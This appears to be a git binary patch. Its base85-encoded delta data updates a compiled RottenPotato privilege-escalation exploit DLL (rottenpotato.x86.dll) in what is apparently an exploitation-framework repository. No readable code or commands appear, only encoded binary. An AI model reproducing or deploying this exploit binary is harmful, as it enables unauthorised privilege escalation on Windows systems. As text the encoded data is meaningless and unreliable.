zY$RoiDScH(kxwxJij|1tUJ%hA!*-EU%7l``3s;RwtCvFEIUe0jsbg^}C<@RDUc}+_z5y7$AZB%ph=Kr_ z;_>490qA-a{jnsV9YGn8h&4_*h|v%|p~;>TamZgg5GD7E5d%1x27Rq_Q9qjsv1HhST+&m z1+|N)G+cwVX{ZhjxPWkL;TVK=tQ1iL5g#(h43lX!QZ|&ETGrU|E7HxWwmc8^je0JhH#=uGKEX~jwH?^JR5*D#Y{=!TTRY}xe8Rhenn00*HK zPFCC0_h1;H%***lJHP1Sso-&ILaHA@vUu|c`Hr{7E^|s2{3j& zNT;ePrq&)(ZtOB{$G#fj_;x{Bc)wUJ9Ivki`$*&2;bz+6c_)p?*8l}P6`4|;+3V&Y*VHGsM2IQKsm^{)<>0giC!@u!YDeWNJIW4q6UVJ;d z=I9rtIhKdjht}GCEwX|$4vVKonyC?y!CK_J7FuLK&^|52`!F{tSl5E5>h5?KF6$Rf zpOK}zsVQo%FdDC{T&~XbOn(`OY#}(X(`y6m#XG*GV#+A9^-$`DxDd4X&cT{>}RH%s;dxN#mKEXaqCj~EMjltiOtg`~~H32xJO|aGmIcu{#wl><=I*atEFfT)9 z`z83L<}_oLjM!8SWklhY<(v~;+sYS}<#1z{fE7BUxR>MaG&>4$+GVkwFz(zMUEiwK zAu~nB*F)}U{B;^+Xitl%G3GVhEi(e|Zgjx=8P_6-s7<$NbWz*FO^h$0TKMwd3{gDB z91=vmvP2vkV|J87Sk)qRp*#vj3eLrA&!3hPAFIIP~u zOI7q9XLgLBXf}IYgPe>r`^+X@5%Zoy4k)+paZY;RB_YC-K`A`U_(f2v;A4#2A%}#c zoagsJvRxs5A7`%UKvDPg%KWb|f9xh@`bSU-`YN%}YYqz`xlG8_iX&dLTTj^?mg9oK zS(Ghom&idk16N_-nBiHXnnEiS9mbn|iy0HlzOpjh;FHf+n^nfKBTDp3 zPznZoQr^Qj4^atrEn!-i7Kib)<bfAlBE-%)W?4TrFyod z8yfDeS`=syXfkLp=s?gGpc6ptpjU&2fcikKFoq%pA1U}bC>b~nN(N#-)}(=spk$x~ zlnlHNib=9I`zZb)6pHp4X6taO0d2Xmy;h9KFw^B=m@3w0m>ox?&NZbnt%g%@4lx=J zz1q3nj&N_8zNo;pe0XhWPARE!?Vhvf0kcA;uzU@D zS#nlo><}o0vy9z;tFAivoEk(If|89JK`DEJaSXVW=_s*hjM-XV@kQ`YVduA!Xw_oN zWqi3-aMsSChP!h^j|QbMjq!QIF3W$#-SlVBk-w`P-wI0Meo)HUVG%OTTp%0Fo}+3~ zAF60O&~Gr!pp0q;32Rz9DB(;{;;a!*O*1c(1Em}46n^+#d5SqHp{B|x+cc9stmBLg zJE25pf>KboiwD{yep2kY+>Dc@FJRpv(52u7C84W8Pj^t_GdikLF9oIXqe4VoVYW`8UR=iN zt62TFZpzcZ?n-rBcQN4#vuy`!{#lA+M=JXCDF!tB$ZY}T;NC6M7_ zP|mcsQ6uW7y8&>C7O_~3i2l?rK@2=^#f~|sASzU&`lhr)6~`vZR^1zd6=Q?7_T%3O;DCriKjBn;Zvv#j++f_^H{}x z29&}nP>TJ{{0n6;4SLZNmEI;$3a^MkGt6GS$!r#qscdd|Crabgz)O_)1W*cFKq>aH zxPOM3a5UQS8AVRJ*`^wu&nHX`U z**dFcF_!sAmBSEtvfj~MGF4gm4=9Dzmnl38GQDV@(Q}>$ zGNSrQbDF%wJZn_Z=Ruo74ruu`%HnBI3PrP3{+|P-@Ryi*E?rSPfPGt*3%Po2~a zmE~ZOxHh~=?TH+vQUyw3;7aAr14^=L*bJ3Jp?#_vHZx)C`s-BsYETN_iV;`yQb<0M zDI8v;L?T(_LO1AA$QI63a=(C5P;$zpb%o*p2brCtDDh8=mAw6WCEps9vKk+$N6G~S zs>%i^^qV8TzuFurZx1E6Dg$)mp|BSpFOkw0pcJB7V=^-}Sk6kSST=09p)FXWLK?Cr$;rrT{zb%KPU2Sv!tW?d}ZJaD8=MW^-(pK^xUR0mk5V96ex%HgHrg8 zalCZUG_}cw4uv;G$TeoVe40(WU9o0v6jQG;2aln8CL6oSW=tl$mv)6rN>#q2A|aT`zRWHC?J>pHljlfl{~@lwwPnZ^I!B(euK! z=xJf1<7{(_yo&NSDg)~{6L&KmxknkB1xjIuI5FEyxPP`u z#?2e88u}Ez6XWNYo#j(W1DhP-L1#OnJZ}J{P%gI2;Zep_s4_bXVid+4RibM_DLf^P zKvY()7orq)eWpZy2BmPCaa4P|);=dvOPUv<#bZDX-x^X&h4ZnCFSt-YgOcVM#ze_- zOJsqb654WB_8wIBKR;-TlL|p^*`#0xP!b&S7JgvH>?$V@#hkgBAFIsei#>DYlKF|b zX5RsnjY^jI`vWBr|DiG;c!l~os~;juLk@}w^Y|)vY*Mwde$Y6!# ztPpsq=N1{--k($kqFULskU45(DgmD|_&sb8rHnmLf8h*PvFz?{@^oMIxI_x~|Evr@ z1xl(ff>KZ=4A+9U^3z(Q0kwAiIh>NDbu;eBj=O{E;7?_|5|rc`TPu&7%eh76`VX!F zeT2F)hW?^5bPXtl8$gu-TCzL;X6IoW*1VrGQ~aya-vLVDc~GTK>#w1jNL_$81FhxN z&wsONKj5$Z2r+hn*;Zbo*=#iiIih;Cig<=C_k%oz8$c@V(fUaadlnZu8LsG z3M5Na(|whCo~M_TD0tw9CSD#*PF0D8HBn|#yz)QF!Quwx_%={-n08v>X`qCcLWej{ zfl>&Zr4@;x*=D5(yH$ObBYRzv zmEK5D3bxo#EfyQ5#Vi=4+W{Yh~A3O$$L@K>I}05--H5+BSUwi4mucGluAWR%m&VjWYfR)*!X6sCrixQF7iKV@xgElR^U%Q*$bARsp`W(Y8*C^-M6@5B- zw;kPdWNu_;pnoq;T*o^7-|5@Yr>%F331tu^-|WVm)?Me%Dej=lP0=&p`AAf?d>*d5 z=#P89-pp6~!*kq;jJt(7{x`0V=C~&xJbc$q<|+zJztDR>#~pNmdbmwJtS@KI2s=1J zvh%{6`AF%Dz5lTP9m3kt!VA4ow;b|m{fPW9XC``xW~zeU+#2T8!MY2*1-H1P4whpz zv+7gm?-zP65&vNLXM~-zD9qV)q4)JI?tmfP^?&CczCpY<%=xcv{)gEFz0G?={T=^mV4vDkuiTwm~%J!yG_3L(Qfy*dk4RB zI)(ig{$G6Fstj{}LI0<8Hj~EROgi4Zv)xl7)Cctx-pjm-XFA@U?Vf$GIp#NnIm^%u znEMcYCfohyn0uu0H@a=ek1=ra17gG#sMg zzsPlu@7>*UkH5|M{s;1=&35~o-yPiRtuQAJbyp}55pW`=Q-J@Wfi|{;Ig#7Loae@Q zv*sMqr|DU13fm`eK~-z+894!791C!<-3-PJLr8&zNoV_RV$s9Nhij-Y{nkq7D1a^V{XD zd3=QJ_$th~_M0$g{oUqkdn3U^*W z$@iG(zioR1^4#N3C^<6Rc?uQV{fBP*4@H#gmg2NLcksc2{u&+bB=D=hw9|?_cf_df zJ~(GUxHA@oU1az_wf(E??{QqX+Wy--chtdweN23~a~x7!vHu~T3={gA((5!s#Gl??J9J zD6y||%(v#|cp*MICI3j``fKY>m{X6-fb&1F;1ieN4On15c(weY0y+wsid-jI3E02s zhZOeGQ%&0WPNxj2c8w~q@iSdM1^(#MUOI8%u?5zeWcs>=;Wn5$AwBz!&3jjvmLj((P71j-WRuW z`0)H#zI#$wYNB^ezI)=}=)~@neq(o<&N9~<+{^8ISj;k|ih?x3BEygn+QDr-_MI$=td1r zPd=l6?-T0wX)r$L1o3J7y^ph^yZKg_=95p??|m}y@rOGuW}x_kFS^i;9-I`eDfah& z-EG!PykC>U`ySCw#Hfdqz8|rGh+fPh{)Nusf%B?D+CKJA|NC?@9c($`p2(|D%QEn8c zNK}GaVjQQiohO)iq%SUxj|$r6dAumtgz8aRERW8d#Nw&M{|5Dc*mcID*=RL-1$~DG z^P0Ld;StvfqG!;5&_JGX9OrF0^)C1Mup81I|826(=RwE9iQ&9<@>^IvVex4^GjT{* z^lJ7K)^SMOI>O@8!=2ni!rmt=G%=h>D!7Ma^w(nfl4X~rzmtDU?DmQ^#=qP$WW!4> zFD*0s@3i}KEwe1sEiW((Itex)&NAB4vHZHyB)G%!dCMxxM=Y0G-f5X*ImPl5wGDqi zSswF*wu5~1_6>gY*YY~cJj*4P>n$5C-?sdhWxM48OXo?G;Q-4KmgifhiRABO+JFU? zOD!uc8!UHNertJH$YgN5Ws>C;meVcsEQ>53u`Gwm-+A5!v{>%3?6e$U`}7RUdfPSA zyZhR*w0pnh+m>yX9hPpnDR{qf`*W_tY(TQ*B+I{87FZTruClDNY_xpa@)OJdS`Mf% z8J=M|&N8DSXm(`VfCZLIEmv7qTQ*s~Z@Jg9)6%trE!uLJ;ryozP+v_OBaN3lEp+?#t$yme;Y4cY0l_3Mq(vK;5G9_cyr#^&VAzJWts_V^ij zlcwd&pW)oCt%==Ri@ke`-I;-pynV%P-@bM3Re3oVPRq@kKX*p=kHl{Fj=SIO-?ve_ zCe56iH-B2r)w6D$Ig3nIc$eJo9yj=^9wc}5tn6vCvT|l*UDW++Q5Vn5$(u2kx26`~ z?^c}qtBcb`3ues9<9=d~Yo^W2yLk58i8E*2lr!VX>3XjIqI_p+kBKvHnl&xQ1dN@P zB{%0nZ`uRy-}|4fTuk-G-gx88Su^u)yL{Tbo1Oc-u@AZfxsNdQLHEU>H9c$@ZQVC^ zZ>P9eWAj1=0FYK+@* z+;aE6KwzJ@W`#S3mythR;STQ`sY1ysZT3ulQ+F z@7%cK*I&J;m2U3XrUJ9#Op9fkWrtI>@qn0Nq=k6lkRx4 zFWUR)Nw*L7z9+d(_ucz=BSTzGr+H&Teh`TE7KXUp;Cn@TwIM#*^JcW!y=aYloEKf@ z$Cv=T^UC}Lu}{NmQJJ6Pc7q}1{??rG?)>|B+sfTYlUj_oubkHg)4Z1}xK|Qa;l^Q) ztzZz5i~)Q8WE^6=-j$5bH1G6E-(gOrU)}AMey)Kvzhy9GjXO*!tns7L9^|>k9jT~m zDejSL{n}tFpE+y&_+@MTa_%!2`;?y=X~%kNo-&n}{i(4}uXf|S;Z>$IvS(KL)mT*J zM_W|w4)eaM^4o9hI-;GhuG>}v%~|(bxf<8`McuW|&z*GDb;P%w)yLae?HAmyL~M=k zJhsL!@x~f=q_?`pZ+dJ+46OGt!JurtpUjY2cYqgO%S4doVXFiaYEAVv>CL}dzty+b z`ca3}`Hi}$&b>zNPqRMH*LA$=WSj1k4Srip*x)za@(q4PHr8{O^2-f=2GgE)`+J{l z;KmFcS?^~yr`~tQ%P-oH7v3G5zQ(oNYp4^?wFB|<_$Xy*ol0w9x&Hv1j>vH_*jVWN?s`uK4#%;5tIaIMhW1eGDkz zqe0|V)EIWZhI8oaI(m)gy}>-ShmZIv%E1<$IO1cAeNZvBK63mAt;ZI#hL~4##Ht|w z^gd1%95Iv!@36%)kUP=!c@B0owm1n5!xnQ;BDQ!JO2;mNw+~|g1E+mZVC&{tLT8cXy@ zPAT|^?kSu(v5Vj>r_%rK)s*N|Zto#Q7Js&O^Ntd8F>{PhS+QslcNIvcG z*|T`y2fG3G8D;$A;U(5ig%2S4^J|^XJJ#L-*Zqmld4#WrFC;Nmf^0Nm96+jNCmeG& z{YrQ;oPZRb4&Ovsgztx=&f(E3>?D|j3=&5n3@6H%Zw zJ-jQK%1q*O#1f1jkRo)#*Df*<+TgE95uA%1XE2f-2PY#QeMGBMIR@M9OH!R(X+p!BJ5_^g;XH%tu!VY!du{O?gJ!5#_IkbJ~DtX%-#^lj$m?TyMG{0**k+cqE)??R2;ZDX%5) zg`nNh2!BK+*V1&b>d(wvWFU4S6~dXy>tjffN5UH9PbTmyB%cmADbv_FaL_agM4E9h z1u3q0x3z;s7(4BTc>i=$n-cgTQVn*(p*I+N7`)Be1@ML}zK5swS@3P70=2-NGfZYt z@Jwqb!hEDO#SJs)f0d}7jqDpusl~oGnWG>EmZJtTsDw$`jCO3X$4oNAj)33)g%c93 z)d^p@nSo4=x5Dpp_zGI#@Z4FPcnBX2Kbzw)5in=W2|CW#a~WWhX*zi1JX5+{T#gzVQ*~A=NSuw%PD@c;W)%6A!awYyOv!e=7rugv3XX zTBQ`eh?Gzh{KSTL!A1Ed<4Sn!ZKlg&-~^=pPKVD}dlQ^{JBKK(l?S~$s6Ba=!r*88 zQ_b4p6$K`h1B0Uumq`~;uKm{ts<5enu=Az4%x&N zCol5T4?1}m|3q0tXoV-=WilQKXCp-@g4?XU6AoT%!V_UCQfp3#Qy-Y;n1@SHcfa4sko+N%tC`cz6x+3j`mw zb}4+t+FRjQNCoW(VjO)RBlgc+xxy=vc4Wh+tla>=S?X~769FEvjC(y~90R{V^4|-q ziWx`vh#w)H<2w}g07nkt;^Pl8*fSZh@W&GRzm$x-Fy<^b1E&CXqE$o?cdg(?`4r}S z_`pLnH~uB?UnrRjcEX(=qa1%Ry_Bn4G7ztS%w(1ce|#MOY2*dpT}@%}*|D1Ae`3gN zq{ClP22M^H7n9}O#mC+OzeH-%z0j?s*@-N^{uIrQ&o=l?6@?(Y171|kDVy*Vco$OK zBG{{jxrE9@!pqjvDt`{LQA^EGDLb0rcSsTT!!a97qRDV&J%b7#@q47&cfx-^&A_8O z+Tg#RG2w0S?PuvGTBQZP)nMYbz>4S01xO|QA^1GE@F{gC3~MxplMBZq4Zsw*<0TF| zH5Xj}3O0#0!hwG?M?oAsW-F&`3K0!ABVF}2z+JEMagMlq;Ih{!-1V+g3`aIIA7BS% zlptL=h)dt#)Judm*!d=fAT#lqxA37!H^IDrI8GtsK)kQT#4Uz3+ewQ=*TZ4&aJC&!NADobEKbKTrIr5QseWqZLJ?^s7s0<+L}x`k28*Ei>Q-lzjs}aA+IXii8h?(YqL1K{jNpMx{3~bHUR-VN75rz~_;s z(nfg0ZgVEgg7+YQRKqusYO@WVyvG!1BzzcYke0&z*6xDmern>5hQTkjK_T|S!~Vld zHZwS-!ds9c=fbh=%m+8}9T%MRIfD>81AdI;(*_5AVKR<~m!noSI}9Qft`I(fROk?V z!`MM*8^)<$a!9Dg@NuLFt6=0_lR*qzjT-2`5Ip^B6P^g`P!r+xF!~!4F5ZsRH3jg$ zNIp&nV+P3FyX+xD2>{SIS2Tli7h_$ z1N*3PE4;4L6k-b8jxwlN+K;?%h*Ys$_zu#T*c-%n;3sOvMl+oCvl-R7uy>cS6XC`{ zz{#L%8sWpd&(};1O5xh@fU}cA?0}cK0lzy^;Re)3fp)-PkATyHPa&MdLsAJ8CcDbNl$^@xB!05jo5kz`DwDKLc8yyD-GYPJ=Q;-Q#i>?F7Z z$w%z4;o@CK1^nxVB}cKeeoR!rsi%3xdA-?zod?@c5w`f}V@#rX@P4GsN?>`PfPd9g z342Ee{L^tXEJp2ApbEzIHJOQJNE2NvJcjp6V|D*08lwi45Me!>dMuG>>P)z$f50CT z4RF~2lTa~y<+y;;q-KW$Vofdg!np%!Et)qEzKhfnJK%sp#wQlugj9iSSQE4x>!CN; zG<7NL6=xzu!evMwFdE@uLjwMJJqEJsm)VcfvyM`07*3}5(DfCHQ^gOid1PCnroF!pSd@km&Mii6Zs`EIe@ewzn7;G`(d{Z&;dTVFG&DL&!!QK2* zqI+QG7}H$hr>G={CW2d&&4eSCTwo3%aWB%H5%JRt85d;S4)eyDG{qSg8UJkfBucrN zIRj4RElh6H1z8S@V|RSONoPkKyd3$pgj-XvDTKHi`BO4nc`1FU8p8ufXUI;t`!Whh zI!-DXqgH%!VLNIfT-9a{}E!K_lU1NEJwh%dA}t-?X-K6CB2qg%Af^ zZ6fS}w@flV`Ed3%WOfU+ghyqVmWYDqA{AmZT!573UO4$W&Lj9wfiIw7A{&huv6D?^ zS+LaFV#AbxGY%i|#HoItIR)^@>9hplQE&=M$|X^leFM`l7oXzcSv2)*W>PqH2IFHE zT>vNEXbPHsBgg-VH<>9m9(pJSr&9P*HiM1~n&5z$0VkL6SU3l%Rr27#znB8W!HbX% z#S}R9<^T(NaKQp2b0{dbn1IwO;$+`u{-1*JGEx(5g$cKC>{1&sZVt^w#^P;A85h8l z=9*C*5BH;F;)>tTW1hf2E01QMPnu-h0%I1K?h{`xU_6ojHW&!r$zjI^U->&HB9$&4 zUWk<0ICv+j$EOg!k6N)?VYnT%W?NzTUB=!7_aGHie0Z_xf)I>dVy0(t9Fk8e%(Ekd4=o>}~MadyO3fLnxQX;y$DT?T2R-8J{G00L9_c2`{|QwjBH`QX!gP z;!@);K8RM~U$T^D*=l!)LzWq*Lbw|#v%PR}v6&e+!MpA^eZK@giv`T7-urf1CiuWR2d=|ln%1!u6xCyCZVu$Rx%>Od_RhS(ya2Zkt z#qb3i-Utt?G=-Z2tF65rp0mb;kA`<3Wl#WLuy!N-+1g$3+_lDMG+eNj{@*c|TO({d zgmSS%a0gOLh`ra*Li1=+co#~*UINo<7zg-^dyr}@Myxj(hzZsfyK1R5{^C`2CjImv z#wSQM-UFxClQ|h=!E&TR?1yJ>w6%m?Pt!Fd6!8o-K&o**+^~sLGI8r+>Sl8_Tn~?Z z){Lzfcm-0LX>c(LD)JJHMx-;6_#M)nt^M%(EgT_a)(N*XFu2H|0gif}aO@;_cq7v- zb_5*%B8L|KDdJ0JY>7wz)f6HMIxjP!;RAzC6B}+G$0+>ID<(oajQX3YSu6}9wNMdk z-fE75PT2S=Clca{m%qjlvVfYw$$zIS=QFj#J*bUvv9;M8y5fpAG^m;XS7JoGNn{cd zmm#%EF>FF=F7fQQ%n>mfKKHh<8{rTCFg5OksV%0U;^^%ZmW;(WWt09k*!T{$SE1o0 z!FQSeaY}_RBOS+E;oCc?8R0E3;XQK*iI1W#YE}gsk*4ZS81qlAatIgSLY-vL0x$c3 z%#=Pn>tCjDDX-teh8%(CFaNH-Zu zVbW)abj0saGWLEr{y&T->=fuBrCADlw;MaUJ;# zgijzRA0PMyY9T!0>wq&9DbWI*Z9;yGt&yZ^G{KVBT(qxqjA3{oJ6Z{g% zXD>YdXJZe8sa<^5z+dd@qW^Wsb+OU+zqA0E#lU)`M8%1}QZvHS;Q%Mhzu}Mse@428 z6BFQ-exxoCuL=wE&-dw2kJanz7_kJY0^$c~6KU=YVnn%SM>4z>DdT)tiBtpefVJJj z!kn{_5*iI3LGmeuAKUOYxQdr9H2}p3Ub5FsDDhTn=fmA7sE>5f9e?>{$ z>2`+lk{+rep)9x`>BFTvEX57_ ze{t+s1;0Xx*d1_0ylK*rFo=|BAzXnp!dJqz)~bHzWD_|Bu0VbUaILkg;Pckj3-qs9yBS_RlBT3dGvGp`LKMO=r_eoQ zkOm(h+R{Zo+svl~<3-X!{#(upUW!#LpPQ9QhYx56VAQZx7&Z-Z~b zryU-CzAYTQ8Y$5XILC(P!I5Lk*b;9;>dFH6Ch81Q%WW86YXiFj9-D0J7&sOw(KNUW zDe_AAlMUy+80Xxv#%Br~ctIEoy17mqd=8$;ucW_zO+VA=(M6Z#H?YhnL+#|0~f{ zjFV=W2=TDN+Tys`CIhj5E;S;9SlD|GgNShx4WC4%goohIb2%KTy*n?=sX?0m*TXlE z?iFr>KU=$N9>@O$c_xE&cn8WM@)Ecesa3>IR7|)tKaATdrknENR-{_C!Wp-kuE~RK z`Mf-hzc~Ch(^?~8De}{Vg?DHg#!1F5q?XtNuUp7GK=>5cj1)n9`A%~t+zNXzZgeLz z0v?Za=njMDTRR!%Te}dxfT9W+ym0a&rg`isa8z)yO2Ks;ybDFJV=IhY!f}ip2QNg* zU>r=hwzvkV(Dm^AyN#U=vyuG8d}|lORn`{!++$iU7>zL%DWM#gb}vh~ld*WwG6o=a z3OufuIUG9{-ht#_0JkG$=G;%BCA1Je39uHmU=Lf)A&1n8d2l6?zqn~R{jUuSXZQ+} z=twvd>0VwAj9h8v0C5^pLRs)RYd6B)51a64Sb&mMIJh6_6fEw3#7tIu;3b~%N%iQD z#cXJDSOR;Nnv0Q0csWun(_q-6Va^U}ApOdiYPIR%wN!o-moE!aIti5APJ}b8-2zXk zqn3Bk)bJOidxFjeX1aP#v4ro0!=5&m-s0qEn2HIX0-xAKH(`h1u4luXE(*N|_S!=K ztEoqC33HBUFeQzI7a^S_(&6JMkI1Xw9;CuK&#~|$lAR6byuirDCl4-Zq!pPN#e|ob zhzJ*dKpKqBU%944qZjkJAc%40%cfb<;9E$S&n+V*UkT&3b1ooU+=v>mH*M$mZ+w^9EMaPd zFYn;wfxQ*By=QFks(;cdgr~#gR=R=6;*bv+?Sv=55GuhIlXf!KV~eYi?hSLnJ4n$S3&+M(GGapr>5@{;Ij5GCz%Mv@c7R;b{P}(@Wd}o z25Imfq(iYDX6!ZTh|MUQxMIRrrl8_CNCWn_2(4`Y!K z?2+&pq`uz-8(77tgK#kvVZy~9@k~k-DH0=CLkHY!D|I4o8@XFO7P3cS|Z*{}gAA+gtq#?FKX;=`Rn;yS|#LpmXe&mtX`Eih{YE6Uu*{4Zl4 z>MY_s4f95Z`yVRAk*6>w2p2C$$}A0TL&?};11qMK;3JM^WtMs}7N;N;Iv*aDz~UqL zM8O1-3IsuQg{a(%gQIE_c0~IO(=vN z#R@0aqixtF@Pkp*lygA`+`{ibbr9YH-$5}Mv~&>T7wsTX?h-izk!X{ghJJh?s15xLfY$eyt@Zu2 z47+Uo=7fH3LAI9r*7Du5MXeMsThtomvbDCk7POZwYGwKiT32LAc0XLys_gP%Rra8x zCE2whYSnVtq85;qEowb)*;<%ei*3smH(OiOx`7JU+R|ERS++>yrouSJ5j+^u$qTI^T0)=brsrLwjDsMf%gtp!B2I;d<>YgEeC+LBrVQnsk| zBV~(PVNv#wu?$=!TU;FEU&-w>FVtFkvbFS`maj|aCWEM@=oCTJ!gA_wQH#ncT+~`{ zQ}|deY8^O*i_@(wF0{6&MbP9Elu>6lM6IT!9pWx)i(1`G;bP1`qn)V2#X1LhwXP4^yqxbsfzG^`H|Ny z+YYeA$s_yS*z+T5V`}4TlWJ3HGitMI^J|N0OKYoY8)}VrBtU?XI5ud=T_%e7go2` zwAXahbk=wUKe?9v0A{)w@%9_hs%390X%DjJfx^bgJ z6-gDpFI`M!W@UC|Ze@ODVP#QeNo8qesItAXqq4Koi#p&wp_VxH(uTSw8r}&p2TcsLRnJT|Le$#4=nNC z+V3v+4*cxy9YsPd{74KH?_eNDRmD{$R3%rXRb^J?Ruxv2RE4VQtD34>s@ke}XntMP zy0~=->yp=bF~7Jw11;Y7zqqdtB8ezILxGgFX=^jq{=Uz>tv|Zw99HF5XG_YjZbR7e HgoytI^%g!x diff --git a/data/exploits/rottenpotato/rottenpotato.x86.dll b/data/exploits/rottenpotato/rottenpotato.x86.dll index 0963215dab11dfac020ff9ca0f065b267dcd14d2..9da2efd5d8884a4763d6059b719928980aa028d2 100644 GIT binary patch delta 102827 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 